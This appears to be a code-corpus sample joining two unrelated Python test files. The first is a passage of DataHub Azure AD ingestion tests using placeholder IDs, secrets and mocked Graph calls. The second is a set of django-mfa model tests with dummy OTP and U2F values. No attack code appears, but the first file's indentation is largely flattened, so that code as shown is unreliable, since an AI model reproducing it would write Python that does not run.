FROZEN_TIME = "2021-08-24 09:00:00"
def test_azure_ad_config():
config = AzureADConfig.parse_obj(
dict(
client_id="00000000-0000-0000-0000-000000000000",
tenant_id="00000000-0000-0000-0000-000000000000",
client_secret="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
redirect="https://login.microsoftonline.com/common/oauth2/nativeclient",
authority="https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000",
token_url="https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000/oauth2/token",
graph_url="https://graph.microsoft.com/v1.0",
ingest_users=True,
ingest_groups=True,
ingest_group_membership=True,
)
)
# Sanity on required configurations
assert config.client_id == "00000000-0000-0000-0000-000000000000"
assert config.tenant_id == "00000000-0000-0000-0000-000000000000"
assert config.client_secret == "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
assert (
config.redirect
== "https://login.microsoftonline.com/common/oauth2/nativeclient"
)
assert (
config.authority
== "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000"
)
assert (
config.token_url
== "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000/oauth2/token"
)
assert config.graph_url == "https://graph.microsoft.com/v1.0"
# assert on defaults
assert config.ingest_users
assert config.ingest_groups
assert config.ingest_group_membership
@freeze_time(FROZEN_TIME)
def test_azure_ad_source_default_configs(pytestconfig, tmp_path):
test_resources_dir: pathlib.Path = (
pytestconfig.rootpath / "tests/integration/azure_ad"
)
with patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource.get_token"
) as mock_token, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_users"
) as mock_users, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_groups"
) as mock_groups, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_group_users"
) as mock_group_users:
mocked_functions(
test_resources_dir, mock_token, mock_users, mock_groups, mock_group_users
)
        # Run an Azure AD ingestion pipeline.
pipeline = Pipeline.create(
{
"run_id": "test-azure-ad",
"source": {
"type": "azure-ad",
"config": {
"client_id": "00000000-0000-0000-0000-000000000000",
"tenant_id": "00000000-0000-0000-0000-000000000000",
"client_secret": "client_secret",
"redirect": "https://login.microsoftonline.com/common/oauth2/nativeclient",
"authority": "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000",
"token_url": "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000/oauth2/token",
"graph_url": "https://graph.microsoft.com/v1.0",
"ingest_group_membership": True,
"ingest_groups": True,
"ingest_users": True,
},
},
"sink": {
"type": "file",
"config": {
"filename": f"{tmp_path}/azure_ad_mces_default_config.json",
},
},
}
)
pipeline.run()
pipeline.raise_from_status()
mce_helpers.check_golden_file(
pytestconfig,
output_path=tmp_path / "azure_ad_mces_default_config.json",
golden_path=test_resources_dir / "azure_ad_mces_golden_default_config.json",
)
@freeze_time(FROZEN_TIME)
def test_azure_source_ingestion_disabled(pytestconfig, tmp_path):
test_resources_dir: pathlib.Path = (
pytestconfig.rootpath / "tests/integration/azure_ad"
)
with patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource.get_token"
) as mock_token, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_users"
) as mock_users, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_groups"
) as mock_groups, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_group_users"
) as mock_group_users:
mocked_functions(
test_resources_dir, mock_token, mock_users, mock_groups, mock_group_users
)
        # Run an Azure AD ingestion pipeline.
pipeline = Pipeline.create(
{
"run_id": "test-azure-ad",
"source": {
"type": "azure-ad",
"config": {
"client_id": "00000000-0000-0000-0000-000000000000",
"tenant_id": "00000000-0000-0000-0000-000000000000",
"client_secret": "client_secret",
"redirect": "https://login.microsoftonline.com/common/oauth2/nativeclient",
"authority": "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000",
"token_url": "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000/oauth2/token",
"graph_url": "https://graph.microsoft.com/v1.0",
"ingest_group_membership": "False",
"ingest_groups": "False",
"ingest_users": "False",
},
},
"sink": {
"type": "file",
"config": {
"filename": f"{tmp_path}/azure_ad_mces_ingestion_disabled.json",
},
},
}
)
pipeline.run()
pipeline.raise_from_status()
mce_helpers.check_golden_file(
pytestconfig,
output_path=tmp_path / "azure_ad_mces_ingestion_disabled.json",
golden_path=test_resources_dir / "azure_ad_mces_golden_ingestion_disabled.json",
)
def load_test_resources(test_resources_dir):
azure_ad_users_json_file = test_resources_dir / "azure_ad_users.json"
azure_ad_groups_json_file = test_resources_dir / "azure_ad_groups.json"
with azure_ad_users_json_file.open() as azure_ad_users_json:
reference_users = json.loads(azure_ad_users_json.read())
with azure_ad_groups_json_file.open() as azure_ad_groups_json:
reference_groups = json.loads(azure_ad_groups_json.read())
return reference_users, reference_groups
def mocked_functions(
test_resources_dir, mock_token, mock_users, mock_groups, mock_groups_users
):
# mock token response
mock_token.return_value = "xxxxxxxx"
# mock users and groups response
users, groups = load_test_resources(test_resources_dir)
mock_users.return_value = iter(list([users]))
mock_groups.return_value = iter(list([groups]))
    # For simplicity, each user is placed in ALL groups: a single canned user
    # response is reused for every group rather than mocking one response per
    # group in the sample data (see the commented-out variant below).
mock_groups_users.return_value = [users]
# r = []
# for _ in groups:
# r.append(users)
# mock_groups_users.return_value = iter(r)
MicroPyramid/django-mfa | django_mfa/tests/test_models.py | Python | mit | 2,572 | 0.001166 |
from django_mfa.models import *
from django.test import TestCase, Client
from django.contrib.auth.models import User
from django.contrib import auth
class Test_Models_Mfa_U2f(TestCase):
def setUp(self):
self.client = Client()
self.user = User.objects.create_user(
username='djangomfa@mp.com', email='djangomfa@mp.com', password='djangomfa')
self.userotp = UserOTP.objects.create(
otp_type='TOTP', user=self.user, secret_key='secret_key')
self.user_codes = UserRecoveryCodes.objects.create(user=UserOTP.objects.get(
user=self.user), secret_code="secret_code")
self.u2f_keys = self.user.u2f_keys.create(
public_key='publicKey',
key_handle='keyHandle',
app_id='https://appId',
)
self.client.login(username='djangomfa@mp.com', password="djangomfa")
def test_mfa_enabled(self):
self.assertTrue(is_mfa_enabled(auth.get_user(self.client)))
def test_u2f_enabled(self):
self.assertTrue(is_u2f_enabled(auth.get_user(self.client)))
def test_user_data_saved_correctly(self):
user_details = auth.get_user(self.client)
self.assertEqual(self.user.username, user_details.username)
self.assertEqual(self.user.email, user_details.email)
self.assertEqual(self.user.password, user_details.password)
def test_userotp_data_saved_correctly(self):
user_otp = UserOTP.objects.filter(
user=auth.get_user(self.client)).first()
self.assertEqual(self.userotp.otp_type, user_otp.otp_type)
self.assertEqual(self.userotp.user, user_otp.user)
self.assertEqual(self.userotp.secret_key, user_otp.secret_key)
def test_u2f_key_user(self):
user_u2f = U2FKey.objects.filter(
user=auth.get_user(self.client)).first()
self.assertEqual(self.u2f_keys.user, user_u2f.user)
self.assertEqual(self.u2f_keys.public_key, user_u2f.public_key)
        self.assertEqual(self.u2f_keys.key_handle, user_u2f.key_handle)
self.assertEqual(self.u2f_keys.app_id, user_u2f.app_id)
def test_u2f_to_json_function(self):
user_u2f = U2FKey.objects.filter(
user=auth.get_user(self.client)).first()
self.assertEqual(self.u2f_keys.to_json(), user_u2f.to_json())
def test_recovery_codes_generated(self):
user_codes = UserRecoveryCodes.objects.filter(user=UserOTP.objects.filter(
user=auth.get_user(self.client)).first()).first()
self.assertEqual(self.user_codes, user_codes)